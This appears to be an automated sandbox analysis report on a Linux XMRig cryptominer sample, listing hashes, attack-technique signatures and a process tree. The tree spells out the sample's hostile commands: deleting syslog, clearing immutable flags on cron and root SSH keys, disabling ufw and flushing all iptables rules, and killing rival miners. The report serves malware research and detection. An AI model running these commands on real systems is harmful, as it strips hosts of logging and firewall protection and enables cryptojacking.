Analysis
-
max time kernel
149s -
max time network
143s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
27-09-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
-
Size
30KB
-
MD5
fa8008ca091d7d984279655e9bc577d8
-
SHA1
2cb21f9e3473a1fb6e3718b2018d6eea5f6f5020
-
SHA256
3c0e677024ea8554a0eed96c62ef39549cefebb44937d9c778926daac67d5495
-
SHA512
138f3847581ed8730764453da36c9555dd669e0bf5efc0c6f2433d443afeb4419cd6f190d97417dfa47a8cde3ab145e75664e96b16aad991ab5f10bf8204d9db
-
SSDEEP
384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKS:p78zQ5VFNcDAFLcIwgnoYq0xFBVZHttn
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid process 3126 3130 3135 -
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
rmdescription ioc process File deleted /var/log/syslog rm -
Flushes firewall rules 1 TTPs 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
Processes:
ufwiptablespid process 1532 ufw 1707 iptables 3075 -
Processes:
modprobeioc pid process /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1536 modprobe -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
xargsxargsxargsxargschattrxargsxargsip6tableschattrxargsxargsxargsxargsxargsxargsiptablesxargsxargsxargsiptablesiptablesip6tablesip6tableschattrxargsxargsxargsxargsxargsiptablesiptablesip6tablesgrepxargsxargsiptablesxargsxargsxargsxargsip6tablesxargsxargsxargsxargsxargsxargsxargsip6tablesip6tablesxargsxargspid process 1913 xargs 2119 xargs 2382 xargs 2511 xargs 1529 chattr 2227 xargs 2459 xargs 2909 1666 ip6tables 1721 chattr 2034 xargs 2143 xargs 2202 xargs 2318 xargs 2616 2531 xargs 2536 xargs 1556 iptables 1928 xargs 1959 xargs 2232 xargs 1554 iptables 1588 iptables 1669 ip6tables 1701 ip6tables 1528 chattr 1828 xargs 2019 xargs 2612 1840 xargs 1848 xargs 2165 xargs 2716 3012 1568 iptables 1589 iptables 1681 ip6tables 1728 grep 1944 xargs 2551 xargs 1557 iptables 2138 xargs 2577 2303 xargs 2601 1893 xargs 2197 xargs 2676 2680 2720 1665 ip6tables 1792 xargs 1865 xargs 1989 xargs 1898 xargs 2049 xargs 2059 xargs 2654 3000 2471 xargs 1634 ip6tables 1649 ip6tables 1923 xargs 1938 xargs -
Disables AppArmor 28 IoCs
Disables AppArmor security module.
Processes:
pid process 3054 3054 3074 3079 3085 3074 3074 3099 3085 3085 3067 3079 3054 3054 3074 3085 3085 3054 3079 3079 3091 3074 3079 3085 3054 3074 3079 3089 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
Processes:
description ioc pid process Changes the process name, possibly in an attempt to hide itself (sysv-install) 3071 -
Reads CPU attributes 1 TTPs 64 IoCs
Processes:
pspspspkillpspspspspspspspspskillpspspspspspspspspspspspspspspspspspspspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
modprobedescription ioc process File opened for reading /sys/module/ip6_tables/initstate modprobe File opened for reading /sys/module/x_tables/initstate modprobe -
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
Processes:
pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspid process 2344 ps 1849 ps 2045 ps 2258 ps 2472 ps 2482 ps 1844 ps 1975 ps 2166 ps 2040 ps 2144 ps 2223 ps 1970 ps 1980 ps 2035 ps 2208 ps 2238 ps 2365 ps 2395 ps 1899 ps 2110 ps 2134 ps 1945 ps 2383 ps 2454 ps 2183 ps 2477 ps 1914 ps 2442 ps 2466 ps 2412 ps 1929 ps 2203 ps 2377 ps 2139 ps 2161 ps 2243 ps 1909 ps 2070 ps 2095 ps 2248 ps 2304 ps 2389 ps 1995 ps 2065 ps 2100 ps 2286 ps 2314 ps 2154 ps 2418 ps 1725 ps 2005 ps 2085 ps 3103 2309 ps 2460 ps 2487 ps 2090 ps 2218 ps 2000 ps 2020 ps 2060 ps 2213 ps 1950 ps -
Processes:
pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsdescription ioc process File opened for reading /proc/1199/status ps File opened for reading /proc/2259/status ps File opened for reading /proc/10/stat ps File opened for reading /proc/1042/status ps File opened for reading /proc/84/status File opened for reading /proc/978/status ps File opened for reading /proc/1350/cmdline ps File opened for reading /proc/1/stat ps File opened for reading /proc/173/status ps File opened for reading /proc/162/status ps File opened for reading /proc/1042/stat ps File opened for reading /proc/30/status File opened for reading /proc/1129/status ps File opened for reading /proc/1152/cmdline ps File opened for reading /proc/203/cmdline File opened for reading /proc/1157/cmdline File opened for reading /proc/1350/stat ps File opened for reading /proc/14/stat ps File opened for reading /proc/1211/cmdline ps File opened for reading /proc/621/cmdline File opened for reading /proc/311/cmdline File opened for reading /proc/972/cmdline File opened for reading /proc/317/cmdline ps File opened for reading /proc/8/stat ps File opened for reading /proc/10/status ps File opened for reading /proc/1140/status ps File opened for reading /proc/171/status File opened for reading /proc/1207/status File opened for reading /proc/1520/status File opened for reading /proc/173/cmdline ps File opened for reading /proc/978/status ps File opened for reading /proc/1203/status File opened for reading /proc/486/cmdline ps File opened for reading /proc/168/cmdline File opened for reading /proc/1136/cmdline File opened for reading /proc/1140/cmdline File opened for reading /proc/20/status File opened for reading /proc/414/stat ps File opened for reading /proc/486/status ps File opened for reading /proc/36/cmdline File opened for reading /proc/158/cmdline File opened for reading /proc/1202/cmdline File opened for reading /proc/6/status File opened for reading /proc/1526/stat ps File opened for reading /proc/268/status ps File opened for reading /proc/115/cmdline File opened for reading /proc/85/cmdline File opened for reading /proc/6/cmdline File opened for reading /proc/177/status File opened for reading /proc/1004/cmdline ps File opened for reading /proc/24/stat ps File opened for reading /proc/414/cmdline File opened for reading /proc/13/cmdline ps File opened for reading /proc/27/stat ps File opened for reading /proc/15/cmdline File opened for reading /proc/1309/cmdline File opened for reading /proc/461/status File opened for reading /proc/3/status File opened for reading /proc/1246/stat ps File opened for reading /proc/1526/stat File opened for reading /proc/965/cmdline ps File opened for reading /proc/12/status File opened for reading /proc/452/cmdline File opened for reading /proc/3114/cmdline -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
modprobegrepgrepgreppid process 1536 modprobe 2087 grep 2117 grep 2331 grep 2871 -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118description ioc process File opened for modification /tmp/log_rot fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Processes
-
/tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes118/tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes1181⤵
- Writes file to tmp directory
PID:1526 -
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:1527 -
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
PID:1528 -
/usr/bin/chattrchattr -iua /var/tmp/2⤵
- Attempts to change immutable files
PID:1529 -
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵PID:1530
-
/usr/bin/chattrchattr -i /etc/crontab2⤵PID:1531
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1532 -
/sbin/iptables/sbin/iptables -V3⤵PID:1533
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1534
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1535
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:1536 -
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1543
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1546
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1547
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1548
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1549
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1550
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1551
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1552
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1553
-
/sbin/iptablesiptables -F ufw-after-input4⤵
- Attempts to change immutable files
PID:1554 -
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1555
-
/sbin/iptablesiptables -F ufw-before-input4⤵
- Attempts to change immutable files
PID:1556 -
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
- Attempts to change immutable files
PID:1557 -
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1558
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1559
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1560
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1561
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1562
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1563
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1564
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1565
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1566
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1567
-
/sbin/iptablesiptables -F ufw-track-input4⤵
- Attempts to change immutable files
PID:1568 -
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1569
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1570
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1571
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1572
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1573
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1574
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1575
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1576
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1577
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1578
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1579
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1580
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1581
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1582
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1583
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1584
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:1585
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:1586
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1587
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
- Attempts to change immutable files
PID:1588 -
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
- Attempts to change immutable files
PID:1589 -
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1590
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1591
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1592
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1593
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1594
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1595
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1596
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1597
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1598
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1599
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1600
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1601
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1602
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1603
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1604
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1605
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1606
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1607
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1608
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1609
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1610
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1611
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:1612
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1613
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1614
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1615
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1616
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1617
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1618
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1619
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1620
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1621
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1622
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1623
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1624
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1625
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1626
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1627
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1628
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1629
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1630
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1631
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1632
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1633
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:1634 -
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1635
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1636
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1637
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1638
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1639
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1640
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1641
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1642
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1643
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1644
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1645
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1646
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1647
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1648
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
- Attempts to change immutable files
PID:1649 -
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1650
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1651
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1652
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1653
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1654
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1655
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1656
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1657
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1658
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1659
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1660
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1661
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1662
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1663
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1664
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
- Attempts to change immutable files
PID:1665 -
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:1666 -
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1667
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1668
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
- Attempts to change immutable files
PID:1669 -
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1670
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1671
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1672
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1673
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1674
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1675
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1676
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1677
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1678
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1679
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1680
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
- Attempts to change immutable files
PID:1681 -
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1682
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1683
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1684
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1685
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1686
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1687
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1688
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1689
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1690
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1691
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1692
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1693
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1694
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1695
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1696
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1697
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1698
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1699
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1700
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1701 -
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1702
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1703
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1704
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1705
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1706
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1707 -
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1708 -
/usr/sbin/userdeluserdel akay2⤵PID:1712
-
/usr/sbin/userdeluserdel vfinder2⤵PID:1713
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵PID:1720
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
PID:1721 -
/bin/rmrm -rf "/tmp/addres*"2⤵PID:1722
-
/bin/rmrm -rf "/tmp/walle*"2⤵PID:1723
-
/bin/rmrm -rf /tmp/keys2⤵PID:1724
-
/bin/grepgrep -i "[a]liyun"2⤵PID:1726
-
/bin/psps aux2⤵
- Process Discovery
PID:1725 -
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
PID:1728 -
/bin/psps aux2⤵PID:1727
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1733
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1732
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1731
-
/bin/grepgrep 185.71.65.2382⤵PID:1730
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1738
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1737
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1736
-
/bin/grepgrep 140.82.52.872⤵PID:1735
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1744
-
/bin/grepgrep -v -2⤵PID:1743
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1742
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1741
-
/bin/grepgrep :1432⤵PID:1740
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1750
-
/bin/grepgrep -v -2⤵PID:1749
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1748
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1747
-
/bin/grepgrep :22222⤵PID:1746
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1756
-
/bin/grepgrep -v -2⤵PID:1755
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1754
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1753
-
/bin/grepgrep :33332⤵PID:1752
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1762
-
/bin/grepgrep -v -2⤵PID:1761
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1760
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1759
-
/bin/grepgrep :33892⤵PID:1758
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1768
-
/bin/grepgrep -v -2⤵PID:1767
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1766
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1765
-
/bin/grepgrep :44442⤵PID:1764
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1774
-
/bin/grepgrep -v -2⤵PID:1773
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1772
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1771
-
/bin/grepgrep :55552⤵PID:1770
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1780
-
/bin/grepgrep -v -2⤵PID:1779
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1778
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1777
-
/bin/grepgrep :66662⤵PID:1776
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1786
-
/bin/grepgrep -v -2⤵PID:1785
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1784
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1783
-
/bin/grepgrep :66652⤵PID:1782
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1792 -
/bin/grepgrep -v -2⤵PID:1791
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1790
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1789
-
/bin/grepgrep :66672⤵PID:1788
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1798
-
/bin/grepgrep -v -2⤵PID:1797
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1796
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1795
-
/bin/grepgrep :77772⤵PID:1794
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1804
-
/bin/grepgrep -v -2⤵PID:1803
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1802
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1801
-
/bin/grepgrep :84442⤵PID:1800
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1810
-
/bin/grepgrep -v -2⤵PID:1809
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1808
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1807
-
/bin/grepgrep :33472⤵PID:1806
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1816
-
/bin/grepgrep -v -2⤵PID:1815
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1814
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1813
-
/bin/grepgrep :144442⤵PID:1812
-
/bin/grepgrep -v -2⤵PID:1821
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1822
-
